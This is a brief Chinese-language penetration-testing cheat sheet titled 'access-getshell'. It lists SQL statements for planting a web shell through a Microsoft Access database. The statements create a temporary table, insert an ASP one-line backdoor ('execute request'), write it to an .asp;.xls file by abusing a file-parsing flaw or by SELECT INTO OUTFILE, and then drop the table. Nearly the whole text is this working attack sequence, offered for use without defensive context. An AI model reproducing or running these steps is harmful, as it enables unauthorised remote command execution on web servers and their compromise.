ACCESS渗透测试
access-getshell
直接写shell
# 创建临时表
create table test(a varchar(255));
# 插入一句话木马
insert into test(a) values('<%execute request("a")>');
# 写入文件(需要借助文件解析漏洞)
select * into [a] in '目标文件路径.asp;.xls' 'excel 8.0;' from test;
# 或者采用这种方式(更实际,毕竟文件解析漏洞少见)
select '一句话木马' into outfile '木马文件的绝对路径';
# 删除临时表
drop table test;